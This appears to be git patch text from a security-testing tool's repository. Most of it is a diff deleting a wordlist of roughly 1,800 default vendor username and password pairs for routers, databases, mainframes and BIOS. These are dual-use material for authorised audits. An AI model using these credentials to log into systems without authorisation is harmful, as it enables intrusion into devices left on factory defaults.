+QSRV 11111111 +qsrv qsrv +superdba admin +PORTAL30 PORTAL31 +PORTAL30 PORTAL30 +XPRT XPRT +Crowd password +User 19750407 +18364 + zjaaadc +ilom-admin ilom-admin +rdc123 rdc123 +sysopr sysopr +tasman tasmannet +SYSTEM 0RACLE8I + Cisco router +admin store + SER +blank blank +ADMIN PASSWORD +admin IP address +WEBREAD WEBREAD +ODM ODM +11111111 11111111 +prime prime +AURORA$ORB$UNAUTHENTICATED INVALID +ADAMS WOOD +root vertex25 +sys bin +lp lineprin +Craft crftpw +www www +postgres dbpass +rfmngr $rfmngr$ +sync sync +WANGTEK + 1988 +MAINT +SYSTEST_CLIG SYSTEST +user user0000 +user_approver demo +ilom-operator ilom-operator +Nice-admin nicecti + HELGA-S +answer +NETNONPRIV NETNONPRIV +nuucp +CIDS CIDS +VASTEST +primenet primenet +redline redline + rw +spcl 0000 +admin muze +MBMANAGER MBMANAGER +webmaster +APPLSYS FND + ro +WINDOWS_PASSTHRU WINDOWS_PASSTHRU +USER4 USER4 +hqadmin hqadmin +UOMNI_ +FIELD TEST +sys system +Admin 123qwe +VMUTIL +POST BASE + dn_04rjc +uucpadm uucpadm +halt +FAXWORKS FAXWORKS +admin password1 +EXFSYS EXFSYS +4Dgifts +JMUSER JMUSER +admin imsa7.0 +SUPERVISOR NETFRAME +CIS CIS +UNITY_ + ciscofw +HLW HLW +admin brocade1 +pwrchute pwrchute + setup + Tiny +IDMSSE +postgres svcPASS83 +NSA nsa +!root !ishtar +admin blank +root NeXT +TELEDEMO TELEDEMO + AMIDECOD +recover recover +TRAVEL TRAVEL +lexar + efmukl +viewer +LIBRARY +admin raritan +PO8 PO8 +root@localhost root +NAMES NAMES +secofr secofr +PDMREMI + biostar +MGE VESOFT +USER7 USER7 +OWA_PUBLIC OWA_PUBLIC +questra questra +builtin builtin +SFCNTRL +SAP* 6071992 +boss boss +anonymous password + isolation + Q54arwms +PLEX PLEX +OLAPDBA OLAPDBA + g6PJ +OLAPSVR INSTANCE +user_expert demo +root pixmet2003 +Bhosda Lund +TEST +qsvr ibmcel +CMSBATCH CMSBATCH + ABCD +gropher + AM +administrator admin + condo + Toshiba + familymacintosh +TAHITI TAHITI +NEWINGRES NEWINGRES + AMI?SW + mMmM +man man +VM3812 +root powerapp +ibm service +VIF_DEVELOPER VIF_DEV_PWD +ADMIN WELCOME +Admin Barricade +joeuser joeuser +system isp +IPC +HELPDESK HELPDESK +wlpisystem wlpisystem +TSAFVM +prtgadmin prtgadmin +SYSTEM CHANGE_ON_INSTALL + CONCAT + t0ch88 +webmaster webmaster + djonet +ADMIN changeme +Any + Compaq +UAMIS_ +theman changeit +CISINFO CISINFO +mobile dottie +QS_CB QS_CB +CDEMORID CDEMORID +tech nician +DEMO2 +administrator none +SYS MANAG3R +End User 7936 +PORTAL30_PUBLIC PORTAL30_PUBLIC +sysadmin nortel +SYS D_SYSTPW +SYSTEM SYSPASS +Guest blank +User User +MDDEMO_CLERK CLERK +FIELD FIELD +Admin SECRET123 +Guest Guest +PHANTOM +admin amigosw1 + xmux +write +ADMINISTRATOR SENTINEL +system field + ducati900ss +qsecofr 22222222 + lkw peter + awkward + TzqF +SYSTEST_CLIG SYSTEST_CLIG +ODS ODS +admin axis2 +BLAKE PAPER +TSDEV TSDEV +PRODBM +admin letmein + joh316 +dos dos +login 0000 +APL2PP +system hdms +admin phplist +god1 12345 +admin novell +CICSUSER CISSUS +22222222 22222222 +root passw0rd +user_publisher demo +OSE$HTTP$ADMIN (random password) +def trade +SuperUser kronites +QS_CBADM QS_CBADM +SYSA SYSA + 00000000 +STUDENT STUDENT +Draytek 1234 +SMDR SECONDARY +EREP +VSEMAN + OOOOOOOO +primos_cs prime +demo +fwadmin xceladmin + j64 +MTS_USER MTS_PASSWORD + AWARD_SW +AQDEMO AQDEMO +private ReadWrite access secret + GWrv + MagiMFP + SnuFG5 +IS_$hostname IS_$hostname +HPSupport badg3r5 +ORASSO ORASSO +GATEWAY + t0ch20x +CVIEW +SH SH + zeosx +XXSESS_MGRYY X#1833 + wodj + FOOBAR +SYSMAN SYSMAN +VMMAP +admin urchin +PORTAL30_DEMO PORTAL30_DEMO +Ezsetup +QS_CS QS_CS +administrator PlsChgMe! +CMSUSER + MCUrv +DEMO1 +admin adminadmin +userNotUsed userNotU + AMI~ +root ibm +ncadmin ncadmin +TESTPILOT TESTPILOT + Polrty +fg_sysadmin password +UETP UETP +QS QS +DBI MUMBLEFRATZ +  ILMI +SYSTEM SYS +JWARD AIROPLANE +APPS_MRC APPS_MRC + uboot +Moe hello +SENTINEL SENTINEL +admin netgear1 +Yak asd123 +PDP11 PDP11 + aammii +Flo hello +SLIDE SLIDEPW +root bagabu +primeos primeos + Spacve + 256256 +INFO INFO +checkfsys checkfsys +PRODCICS PRODCICS + foolproof + AWARD_PW +MXAGENT MXAGENT +SYSTEM ORACLE8I +admin no password +VMTLIBR +POWERCARTUSER POWERCARTUSER +VMBACKUP +CPNUC + QDI + shiva +distrib distrib0 +SUPERVISOR SUPERVISOR +SYSMAINT SERVICE +MIGRATE MIGRATE +CDEMOUCB CDEMOUCB +system prime +QSRV 22222222 + c +OLTSEP +sysbin sysbin +signa signa +autocad autocad + SWITCHES_SW +WEBDB WEBDB +daemon + aPAf +ncrm ncrm +SAMPLE SAMPLE + 1 +HCPARK HCPARK +ALLINONE ALLINONE +nm2user nm2user +SAVSYS +IIPS +PATROL PATROL + technolgi + MBIU0 +mailadmin secret +adm adm +TMSADM +tutor tutor +ESubscriber +CHEY_ARCHSVR CHEY_ARCHSVR +write synnet +software software +admin welcome +god2 12345 +bbs bbs + Dell +disttech disttech +FSFTASK2 + zbaaaca + prost +ORDSYS ORDSYS +Administrator administrator + 1234567890 +gopher gopher +PSFMAINT +SYSTEM MANAG3R + RM + s!a@m#n$p%c +EAdmin +12345 12345 +DECNET DECNET +OPERATIONS OPERATIONS +$system +REP_OWNER DEMO +PANAMA PANAMA +LIBRARIAN SHELVES +SYSTEM 0RACLE +fal +4Dgifts 4Dgifts + biosstar +NETSERVER NETSERVER + tiny +root TANDBERG +POWERCHUTE APC +USER5 USER5 +GPFD GPFD + 12345678 +blank admin +QS_OS QS_OS +sysadm admin +REPADMIN REPADMIN +Administrator 12345678 +0 0 +DEMO8 DEMO8 +DEMO9 DEMO9 +CDEMO82 CDEMO82 +admin boca raton +Administrator vision2 +administrator 0 +umountsys umountsys +snmp snmp +Username PASSWORD +volition +USER0 USER0 +CDEMOCOR CDEMOCOR +SYSTEST UETP +Rodopi Rodopi +DECNET NONPRIV +user_checker demo + tatercounter2000 +qserv qserv + ESSEX or IPC +AQ AQ +support +SAPR3 SAP +VRR1 VRR1 +fastwire fw +admi admin +FINANCE FINANCE +WinCCAdmin 2WSXcder +ESTOREUSER ESTORE +fax fax +VIRUSER VIRUSER +LINK LINK +APPLSYSPUB FNDPUB + BIOS +SYS ORACLE8 +SYS ORACLE9 +overseer overseer +checksys checksys +umountfs umountfs +DBDCCICS DBDCCIC +Admin password + x6zynd56 +TOAD TOAD +root mozart +ntpupdate ntpupdate +root router +MDDEMO_MGR MGR +ARCHIVIST +SUPERVISOR HARRIS + 11111 +billy-bob +lp bin +DECMAIL DECMAIL +alien alien +admin dnnadmin +nsroot nsroot +AdvWebadmin advcomm500349 +dvstation dvst10n +SERVICECONSUMER1 SERVICECONSUMER1 +MMO2 MMO2 +qsecofr 11111111 +NOC NOC +WWWUSER WWWUSER +root Serial port only +SAP SAPR3 +root t0talc0ntr0l4! +NEVIEW +MAIL +ODSCOMMON ODSCOMMON +fal fal +pixadmin pixadmin +ripeop +PENG + BIOSPASS +netlink netlink +L2LDEMO L2LDEMO +OUTLN OUTLN +12.x +scott tiger or tigger + toshy99 +dbase dbase + nz0u4bbe +fam fam + bell9 +Oper Oper +RMAIL RMAIL +administrator 19750407 +FND FND +admin exinda +PRIV PRIV +admin barney +SETUP + biodata + 24Banc81 +news news +VSEIPO + j09F +pw pw +GUEST +ilon ilon + award_? +SYS 0RACLE39 +SYS 0RACLE38 +DEFAULT DEFAULT + AMI!SW +PLSQL SUPERSECRET +root alpine +politcally correct +18140815 18140815 +APPUSER APPUSER +SUPERVISOR +CENTRA CENTRA +LBACSYS LBACSYS + alfarome +PDP8 PDP8 +SFCMI +administrator * * # +lpadm lpadm +Test Everything +bewan bewan + 2580 +DIP DIP + Sxyz +mfd mfd +MDDEMO MDDEMO + intermec + 589589 +SWPRO SWPRO +DES DES +root fibranne +Coco hello +GCS +rodopi rodopi + touchpwd= +Scott Tiger +Admin5 4tugboat +admin funkwerk +ANDY SWORDFISH +DESQUETOP +nobody +Manager 657 + mysweex +SYSTEM SYSLIB +NETCON NETCON +JONES STEEL +author author +MOESERV +web web +tech User +PUBSUB1 PUBSUB1 +SYS D_SYSPW +CATALOG CATALOG + IBM + Guest +SQLUSER +RE RE +REPORTS_USER OEM_TEMP +MFG MFG +POST POST +HPLASER HPLASER +HR HR +VIDEOUSER VIDEO USER +DBA SQL + CMOSPWD +guest1 guest +superuser asante +SYSTEM 0RACLE38 +SYSTEM 0RACLE39 +AUTOLOG1 +dadmin dadmin +AURORA$JIS$UTILITY$ +wlcsystem wlcsystem +news +CPRM From 7d79f8a4c28a4c0ef0b78db0637a3c055a81cd32 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 18:15:17 +0200 Subject: [PATCH 335/853] Removed wrongly named list. --- .../default_passwords_large_unhash.txt | 1787 ----------------- 1 file changed, 1787 deletions(-) delete mode 100644 data/wordlists/default_passwords_large_unhash.txt diff --git a/data/wordlists/default_passwords_large_unhash.txt b/data/wordlists/default_passwords_large_unhash.txt deleted file mode 100644 index ff0458f94b..0000000000 --- a/data/wordlists/default_passwords_large_unhash.txt +++ /dev/null @@ -1,1787 +0,0 @@ -admin admin - -admin - admin -admin password -admin 1234 -root -Administrator admin -admin epicrouter -sysadm sysadm - 1234 - password - access -root root -tech tech - smcadmin - 0 -Administrator -root pass - system -root admin - PASSWORD - Symbol -operator -guest guest -admin bintec -security security -guest -debug synnet -manager manager - adtran -admin motorola -service smile - cascade -admin 0 -!root -user password - BRIDGE -netman netman -super super -admin switch -admin setup -admin changeme -diag switch -operator operator -user user -user -Cisco Cisco -Manager Manager -DTA TJM -apc apc -tech - cisco -User -root 1234 -Admin - letmein -cablecom router -adm -wradmin trancell - ascend -manager friend - NetICs -root blender -netscreen netscreen - sysadm - SKY_FOX -sa - public - Master -setup setup -root default - laflaf -cmaker cmaker -enable -MICRO RSX -login admin - Posterie -write private -root attack -monitor monitor - private - xdfk9874t3 -netopia netopia - Col2ogro2 -admin microbusiness -op op -adminview OCS -op operator -admin secure -admin atlantis -sysadmin sysadmin -super 5777364 -echo echo -craft -adm cascade -admin default -maint maint -comcast 1234 -CSG SESAME -diag danger -readonly lucenttech2 -admin operator -Manager -debug d.e.b.u.g -admin hello - SYSTEM -root ascend -root calvin -manuf xxyyzz -cusadmin highspeed -admin 123 -smc smcadmin -admin Sharp -root password -sweex mysweex -disttech 4tas -su super -admin system -root changeme -poll tech -sysadmin password -SYSDBA masterkey -anonymous - 0000 -root permit -admin barricade -support support -root tslinux -admin hp.com -recovery recovery -USERID PASSW0RD -eng engineer -administrator administrator -admin pwp -admin isee -NETWORK NETWORK -JDE JDE -admin superuser -Guest - Super -admin admin123 -super surt -rwa rwa -admin 123456 -admin NetCache - ADTRAN -USER USER -test test -admin extendnet -admin ironport -lp lp - Cisco -administrator -admin 1111 -sysadmin PASS -ro ro -admin Ascend - _Cisco -MAIL MAIL -ami - sitecom -hsa hsadb -system password -MGR CAROLIAN -ADMINISTRATOR ADMINISTRATOR -admin sysAdmin -root tini -admin smcadmin - Helpdesk -FIELD SERVICE -PBX PBX -netman -HELLO FIELD.SUPPORT -system sys -hscroot abc123 -1502 1502 - star -superuser admin -HELLO MGR.SYS -sysadm anicust -Administrator Administrator -netrangr attack - Intel - 12345 -readwrite lucenttech1 - secret -piranha piranha -wlse wlsedb -admin cisco -l3 l3 -admin diamond -none admin -naadmin naadmin -public public -admin 1988 -admin radius -admin root -NETOP -Administrator letmein -HELLO MANAGER.SYS - raidzone - 3ascotel -MANAGER HPOFFICE -demo demo - 166816 -User Password -admin zoomadsl -D-Link D-Link -user public -user pass -l2 l2 -MGR CCC -rw rw -cgadmin cgadmin -storwatch specialist - secure -vcr NetVCR -OPERATOR COGNOS -piranha q -admin synnet -MDaemon MServer -root cms500 -root davox -jagadmin -enquiry enquirypw -at4400 at4400 -support h179350 -davox davox -admin asd -PFCUser 240653C9467E45 -setup changeme -superuser superuser - atc123 -aaa -root admin_1 - 266344 -MGR WORD -topicalt password -admin2 changeme -1234 1234 -MANAGER ITF3000 - connect -FIELD HPONLY -nms nmspw -client client -admin comcomcom - speedxess -MGR ROBELLE - epicrouter -sys uplink -OPERATOR SYSTEM -field support -MGR SYS -root letacla - FORCE -deskman changeme -MAIL REMOTE -SYSADM sysadm -superadmin secret - backdoor -pmd -MGR CNAS -admin 22222 -GEN2 gen2 - medion -ADMN admn -Factory 56789 -PRODDTA PRODDTA -tellabs tellabs#1 -spcl 0 -dadmin dadmin01 - comcomcom -administrator password -helpdesk OCS -dhs3mt dhs3mt -MGR SECURITY -setup changeme! -install llatsni -adfexc adfexc -IntraSwitch Asante -manage !manage -superman 21241036 -MANAGER TELESUP -craft crftpw -login 0 - help -MGR HPOFFICE - lantronix -SPOOLMAN HPOFFICE -manager admin - netadmin -ADVMAIL HP -FIELD SUPPORT -MANAGER SYS -MGR VESOFT -vt100 public -PSEAdmin $secure$ -HELLO OP.OPERATOR -Manager friend - hs7mwxkk -patrol patrol - SUPER - SMDR - 1064 -teacher password -PCUSER SYS -MGR ITF3000 -Any 12345 -OPERATOR DISC -RSBCMON SYS -cellit cellit -MGR INTX3 -inads inads -halt tlah -root wyse -locate locatepw -admin visual -TMAR#HWMT8007079 -rapport r@p8p0r+ -MGR TELESUP -xbox xbox - TENmanUFactOryPOWER -device device -NICONEX NICONEX -admin admin1234 -root fivranne -acc acc -31994 31994 -admin netadmin -bcim bcimpw -websecadm changeme -blue bluepw -topicnorm password -supervisor PlsChgMe - R1QTPS -MGR HPONLY -ccrusr ccrusr -root Cisco -login password -266344 266344 -MAIL MPE -telecom telecom -MAIL HPOFFICE -GEN1 gen1 -Administrator smcadmin -SSA SSA - snmp-Trap -HTTP HTTP - default -mtch mtch -admin adslolitec -Administrator ganteng -bciim bciimpw -browse browsepw -Admin Admin - Password -hydrasna -sys change_on_install -deskres password -bbsd-client changeme2 -anonymous Exabyte -admin rmnetlm -replicator replicator -intel intel -OPERATOR SUPPORT -MGR HPP196 -radware radware -intermec intermec -mlusr mlusr -MGR RJE -FIELD LOTUS -init initpw -e250 e250changeme -MAIL TELESUP -Polycom SpIp -temp1 password - adminttd -tech field -support supportpw -mac - MiniAP -MANAGER SECURITY -3comcso RIP000 -RMUser1 password -WP HPOFFICE -Administrator changeme -MGR XLSERVER -MGR HPP187 -MGR HPP189 -inads indspw -admin linga -craft craft - enter -NAU NAU -rcust rcustpw -admin AitbISP4eCiG -mtcl mtcl -MGR CONV -topicres password -bcnas bcnaspw -MGR NETBASE -admin access -public -adminuser OCS -MGR REGO -Root -cac_admin cacadmin -mediator mediator -superman talent -Anonymous -kermit kermit -admin x-admin -MGR HPDESK - 9999 -root ROOT500 -admin my_DEMARC -volition volition -GlobalAdmin GlobalAdmin - 4getme2 -LUCENT01 UI-PSWD-01 -admin 2222 -LUCENT02 UI-PSWD-02 -MANAGER TCH -adminstat OCS -desknorm password -IntraStack Asante -OPERATOR SYS -MGR COGNOS - Fireport - ILMI -maint maintpw -supervisor supervisor -e500 e500changeme -admin mu -MANAGER COGNOS -deskalt password -admin OCS -bbsd-client NULL -cust custpw -admin noway -tiara tiaranet -bcms bcmspw - TANDBERG -m1122 m1122 -telco telco -superuser -xd xd -dhs3pms dhs3pms -VNC winterm -craft craftpw -maint rwmaint -anonymous any@ -login access -browse looker -customer none -cisco cisco -adminstrator changeme -FIELD MANAGER - 1234admin -FIELD MGR -ftp_nmc tuxalize -me -iclock timely -echo User -ADVMAIL HPOFFICE DATA -login 1111 -login 8429 -Administrator manage - Babylon -admin hagpolm1 -root 12345 -scmadmin scmchangeme -user tivonpw -sysadm Admin -Administrator password -admin administrator -installer installer -webadmin webadmin -ftp_inst pbxk1064 -DDIC 19920706 - pento -admin NetSurvibox -SYSTEM D_SYSTPW -draytek 1234 - 3477 -operator $chwarzepumpe -administrator asecret -EARLYWATCH SUPPORT - 10023 -Manager Admin -super.super -ftp_oper help1954 -corecess corecess -superuser 123456 -admin Password -super.super master -admin Protector -SYSTEM MANAGER -webadmin 1234 -install secret -FIELD HPWORD PUB -admin 12345 -admin symbol -weblogic weblogic -Admin 1988 -system/manager sys/change_on_install -root 3ep5w2u - 8111 - jannie -End User 123 -none 0 -d.e.b.u.g User -admin tomcat -target password -Administrator pilou -MD110 help -Administrator 3ware - ANYCOM -tiger tiger123 -adminttd adminttd -admin asante -admin smallbusiness -admin netscreen -FIELD HPP187 SYS -guest User -maint ntacdmax -admin w2402 -wlseuser wlsepassword -SAPCPIC admin -ftp_admi kilo1987 -admin articon -mtcl -default.password -admin michelangelo -manager changeme -root Mau'dib - Serial Num -root ggdaseuaimhrke -7 maintain -2 syslib -ADMIN admin -system weblogic -Administrator ggdaseuaimhrke -ADMIN -itsadmin init -PUBSUB PUBSUB -admin demo -system manager -sys sys -CTXSYS CTXSYS -ftp -bill bill -192.168.1.1 60020 @dsl_xilno -FIELD -admin dmr99 -setpriv system -GUEST GUEST -SAP* 06071992 -operator 1234 -t3admin Trintech -hello hello -supervisor -CISCO15 otbu+1 -1.79 Multi - babbit -mso w0rkplac3rul3s -Telecom Telecom -qsysopr qsysopr -admin TANDBERG -admin imss7.0 - nokia -APPS APPS -Developer isdev -mail mail -admin draadloos -qsecofr qsecofr -11111 x-admin - default.password -Service 5678 -enable cisco -netadmin nimdaten -Polycom 456 -admin P@55w0rd! -admin 1234admin -root par0t -any system -db2fenc1 db2fenc1 -johnson control -2 maintain -isp isp -demos -QSRV QSRV -root iDirect -MDSYS MDSYS -Admin 123456 -2 manager -vpasp vpasp -TEST TEST - Telecom -QSECOFR QSECOFR -adm none - 2501 -1 syslib -system security -admin leviton -!root blank -informix informix -root mpegvideo -5 games -root 0P3N -engmode hawk201 -scout scout -qpgmr qpgmr -admin admin000 -ADSL expert03 -cisco -images images -admin security -admin surecom -Gearguy Geardog - symantec -comcast -admin adslroot -1 manager -Demo - xyzzy -Administrator adaptec -system system -SAP* PASS -serial# serial# -BACKUP BACKUP -stratacom stratauser -root rootme -6.x -root !root -webadmin webibm - riverhead -mary password -COMPANY COMPANY -SYS SYS -DSL DSL -Jetform -none amber -eagle eagle -ROUTER -root brightmail -admin pass - HEWITT RAND -ods ods -siteadmin toplayer -admin OkiLAN -root rootpass -Alphanetworks wrgg15_di524 - x40rocks - nokai -Admin1 Admin1 -field field -Admin admin -Admin ImageFolio - iolan - manager -admin pfsense -janta sales janta211 -servlet manager -username password -citel password -Replicator iscopy -SYSMAN OEM_TEMP -1 operator -SYSTEM SYSTEM -administrator RSAAppliance -master themaster01 -Admin 1234 -2 operator -SUPERUSER ANS#150 -admin passwort -cn=orcladmin welcome -30 games -maintainer admin -setup - hello -admin NetSeq -BRIO_ADMIN BRIO_ADMIN - citel -internal oracle -CQSCHEMAUSER PASSWORD -root kn1TG7psLu -SYS SYSPASS - lkwpeter -DEV2000_DEMOS DEV2000_DEMOS -FSFTASK1 -checkfs checkfs -BACKUP -USER1 USER1 -root TENmanUFactOryPOWER -SQLDBA -root resumix -HELP HELP -toor logapp -SYS 0RACLE9 -SYS 0RACLE8 - 57gbzb -!root none -qsrvbas qsrvbas -SYSADMIN -EZsetup -Administrator 1234 - sldkj754 -BATCH -STRAT_USER STRAT_PASSWD -Administrator 19750407 - User -user USERP -primenet primeos -OEMREP OEMREP -admin [^_^] -USER6 USER6 -lynx - TTPTHA -powerdown powerdown -root Mau’dib -SYSTEM ORACL3 -$ALOC$ -password -VOL-0215 -admin nimda -tomcat tomcat -REP_MANAGER DEMO -WinCCConnect 2WSXcder -ALLIN1 ALLIN1 -DIRMAINT -eqadmin Serial port only equalizer -sysadm sysadmpw -QSRVBAS QSRVBAS -admin ip305Beheer -debug tech - ACCORD -AQJAVA AQJAVA -LASERWRITER LASERWRITER -Administrator 0000 -root nsi -PERFSTAT PERFSTAT -apcuser apc -MBWATCH MBWATCH - protection -system_admin -unix unix -OWNER OWNER -NETPRIV NETPRIV -VSEMAINT - AWARD?SW -DEMO DEMO -tomcat changethis -SYMPA SYMPA -REP_OWNER REP_OWNER -DCL DCL -FAX -root dbps -ARCHIVIST ARCHIVIST -USER PASSWORD -VTAMUSER -LASERWRITER -VMTAPE -basisk basisk -NetLinx password -OutOfBox demos guest 4DGifts (none by default) -none letmein -NETMGR NETMGR -DEFAULT USER -OAS_PUBLIC OAS_PUBLIC -read -AP AP -demos demos -SYSTEM Admin -admin j5Brn9 -MTSSYS MTSSYS -SYSMAINT DIGITAL -AUDIOUSER AUDIOUSER -Joe hello -IDMS - teX1 -admin allot -$SRV $SRV -snake -SYS 0RACLE -ADVMAIL -Administrator nicecti -ROOT ROOT -PRINTER PRINTER -shutdown -satan - m1link -RDM470 -master access - l2 - l1 -trouble trouble -fax -OP1 -admin@example.com admin -root trendimsa1.0 -HOST HOST -ADLDEMO ADLDEMO -QS_ADM QS_ADM -bin sys - AMI -OPER OPER -oracle -jj -PO7 PO7 -SYSTEM 0RACLE8 -SYSTEM 0RACLE9 -www -joe password - komprie - 123 -MAINT MAINT -CMSBATCH -root toor -CCC -role1 tomcat -DATAMOVE -lp - AMISETUP - sp99dd -halt halt -MSHOME MSHOME -ISPVM -crowd­-openid-­server password -user_editor demo -sedacm secacm -ROOT -Admin 3Com -db2admin db2admin -Airaya Airaya -supervisor visor -none Wireless -SYSDUMP1 -IMEDIA IMEDIA - Biostar -install install -primos_cs primos -admin infrant1 -Administrator Partner - Administrative -USER_TEMPLATE USER_TEMPLATE -pnadmin pnadmin - h6BB -lpadmin lpadmin -guest none -VTAM VTAM -TRACESVR TRACE -POSTMASTER POSTMASTER -MAILER MAILER -RSCSV2 -QS_WS QS_WS - sma -system_admin system_admin -circ -Demo password - rwa -nobody nobody -Tasman Tasmannet -admin !admin -DISCOVERER_ADMIN DISCOVERER_ADMIN -VMASMON -LR-ISDN LR-ISDN -TURBINE TURBINE -GL GL -PO PO - AMI_SW -super superpass -PRINT -MODTEST YES -GATEWAY GATEWAY -root system -PRIMARY PRIMARY -both tomcat - award.sw -haasadm lucy99 -pw pwpw -games games -DOCSIS_APP 3Com -bbs -EMP EMP -Admin cclfb -postmaster -SITEMINDER SITEMINDER -Any Any -vgnadmin vgnadmin -RJE RJE -gonzo -NEWS NEWS -sa Ektron - Award -AQUSER AQUSER -UTLBSTATU UTLESTAT - AMIAMI -netbotz netbotz -CTXSYS CHANGE_ON_INSTALL -xmi_demo sap123 - Crystal - Daewuu -ftp ftp -ORACACHE (random password) -MCUser MCUser1 -prash hello -sync -sysadm admpw -root rootadmin -PM PM -AP2SVP -master master -ibm 2222 -ULTIMATE ULTIMATE -SABRE -role1 role1 -user_pricer demo -admin enhydra -SUPERVISOR NF -EVENT EVENT - xyzall - rainbow -ADMIN JETSPEED -SYS ORACL3 -PORTAL30_SSO_PS PORTAL30_SSO_PS -FSFADMIN -OO OO -WKSYS WKSYS -OPERATNS OPERATNS - ksdjfg934t -UVPIM_ - merlin -OE OE -Any Local User Local User password -OCITEST OCITEST -web - HLT -ADMINISTRATOR admin -ESSEX - last -CTXSYS -None xyzzy -CTXDEMO CTXDEMO -user_designer demo - Admin - zebra -QDBA QDBA -role changethis -LRISDN LRISDN -tele tele -WEBCAL01 WEBCAL01 -rsadmin rsadmin -OMWB_EMULATION ORACLE -root alien -WINDOWS_PASSTHRU - sanfran -public ReadOnly access secret - AMIPSWD -MOREAU MOREAU -fast abd234 -root QNX -host dnnhost -administrator root -admin public -SYSTEM ORACLE - sertafu -ORDPLUGINS ORDPLUGINS -SYSWRM -mail - telos -ADMIN ADMIN -administrator adminpass -savelogs crash - ACCESS -SDOS_ICSAP SDOS_ICSAP -system adminpwd -BATCH BATCH -GUEST GUESTGUEST -SYSMAINT SYSMAINT -postmaster postmast -DSSYS DSSYS - award_ps - ZAAADA -MGWUSER MGWUSER - NTCIP -OPERATOR - hewlpack -TDOS_ICSAP TDOS_ICSAP -ssp ssp -EJSADMIN EJSADMIN - damin -INGRES INGRES -DS - A.M.I -estheralastruey - 1322222 -VCSRV VCSRV -Administrator storageserver -ssladmin ssladmin -CLARK CLOTH -shutdown shutdown -administrator 1234 -OEMADM OEMADM -restoreonly restoreonly1 -quser quser -PRINTER -MILLER MILLER -trmcnfg trmcnfg -REPORT REPORT -user_author demo - aLLy -dpn changeme -tour tour -mountfsys mountfsys -http -PROG PROG - iwill -openfiler password - Public -admin mp3mystic -RAID hpt -read synnet -admin peribit -STARTER STARTER -FAXUSER -GUEST GUESTGUE -DSA - guardone -daemon daemon -mountsys mountsys -SYSTEM ORACLE9 -SYSTEM ORACLE8 - gandalf -backuponly backuponly1 -IVPM1 - leaves -sysadm syspw -root blablabla - Compleri -USER3 USER3 -OPENSPIRIT OPENSPIRIT - spooml - changeit - wg -prime primeos -HPLASER - Vextrex -CSPUSER -qsvr qsvr -lynx lynx -SYSCKP -root letmein -Sysop Sysop -user_marketer demo -IMAGEUSER IMAGEUSER -root Password -bsxuser bsxpass -MASTER PASSWORD -USER9 USER9 -root ax400 -OLAPSYS MANAGER -SYSTEM OPERATOR -oracle oracle -root Mau?dib - MASTER -root t00lk1t -rsadmin - Daytec -OutOfBox - SZYX - cmaker - CTX_123 -rje rje -ODM_MTR MTRPW -QS_ES QS_ES -lansweeperuser mysecretpassword0* -DEMO3 -Username password -GPLD GPLD -uucp uucp -DBSNMP DBSNMP -VMARCH -GUEST TSEUG -SWUSER SWUSER -root 8RttoTriz -VTAM -OPERATNS -Operator Operator -CHEY_ARCHSVR -SYS ORACLE -roo honey -n.a guardone -accounting accounting -backuprestore backuprestore1 -PRINT PRINT - j322 - Craftr4 -dni dni -WEBADM password -iceman -guru *3noguru -FAX FAX -anon anon - j256 -USER8 USER8 -root honey -PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC - 589721 -postgres -WINSABRE WINSABRE -USERP USERP -none public -Admin shs -SYS MANAGER -IVPM2 -PORTAL30_SSO PORTAL30_SSO -ALLIN1MAIL ALLIN1MAIL -POST -TEMP - xo11nE -admin nms -SYSADM SYSADM -BATCH1 -me me -SUPERVISOR NFI -PROMAIL -SECDEMO SECDEMO -ARAdmin AR#Admin# -sadmin -ORAREGSYS ORAREGSYS -VMASSYS -man -FROSTY SNOWMAN -LASER LASER -tutor - ?award -root changethis -DISKCNT -default WLAN_AP -SYSERR -WWW WWW -VAX VAX -none none - Cable-docsis -PROCAL -SUPERVISOR SYSTEM -FAXWORKS -ibm password -CTXSYS UNKNOWN -LDAP_Anonymous LdapPassword_1 -(any 3 chars) cascade -games -User 1234 - Zenith -setup/snmp setup/nopasswd -DSGATEWAY DSGATEWAY -AWARD_SW -CSMIG CSMIG - year2000 -umountfsys umountfsys - BIGO -root jstwo -VMS VMS -dni -bpel bpel -viewuser viewuser1 -admin ISPMODE -TDISK -politically correct -user_analyst demo -admin conexant -guest 1234 -root logapp -admin ip3000 -RSCS -COMPIERE COMPIERE -OSP22 OSP22 -guest1 guest1 -FORSE FORSE - lesarotl -factory factory -bubba (unknown) -admin ip20 -admin ip21 -LASER -QUSER QUSER - AWARD SW -primeos prime -admin tr650 -poll poll - j262 - xljlbj -glftpd glftpd - Advance -RMAN RMAN -mountfs mountfs -DIRECT - console -firstsite firstsite - SW_AWARD -IPFSERV - snake -Administrator Gateway -TSUSER TSUSER -BATCH2 -admin 123123 - 3098z - cc -snmp nopasswd -WebAdmin WebBoard -IBMUSER SYS1 -SMART -voadmin manager -BC4J BC4J -core phpreactor -OPERVAX OPERVAX -Bobo hello - Congress - central -WANGTEK WANGTEK -disttech etas -OWA OWA -USER2 USER2 -jasperadmin jasperadmin -FIELD DIGITAL -root uClinux -guest guestgue -FAXUSER FAXUSER -WINSABRE SABRE -VMBSYSAD -admin ip400 -PVM -ctb_admin sap123 - AMI.KEY - AMI.KEZ -  ANYCOM -USER_TEMPLATE -DEMO4 - inuvik49 -QSRV 11111111 -qsrv qsrv -superdba admin -PORTAL30 PORTAL31 -PORTAL30 PORTAL30 -XPRT XPRT -Crowd password -User 19750407 -18364 - zjaaadc -ilom-admin ilom-admin -rdc123 rdc123 -sysopr sysopr -tasman tasmannet -SYSTEM 0RACLE8I - Cisco router -admin store - SER -blank blank -ADMIN PASSWORD -admin IP address -WEBREAD WEBREAD -ODM ODM -11111111 11111111 -prime prime -AURORA$ORB$UNAUTHENTICATED INVALID -ADAMS WOOD -root vertex25 -sys bin -lp lineprin -Craft crftpw -www www -postgres dbpass -rfmngr $rfmngr$ -sync sync -WANGTEK - 1988 -MAINT -SYSTEST_CLIG SYSTEST -user user0000 -user_approver demo -ilom-operator ilom-operator -Nice-admin nicecti - HELGA-S -answer -NETNONPRIV NETNONPRIV -nuucp -CIDS CIDS -VASTEST -primenet primenet -redline redline - rw -spcl 0000 -admin muze -MBMANAGER MBMANAGER -webmaster -APPLSYS FND - ro -WINDOWS_PASSTHRU WINDOWS_PASSTHRU -USER4 USER4 -hqadmin hqadmin -UOMNI_ -FIELD TEST -sys system -Admin 123qwe -VMUTIL -POST BASE - dn_04rjc -uucpadm uucpadm -halt -FAXWORKS 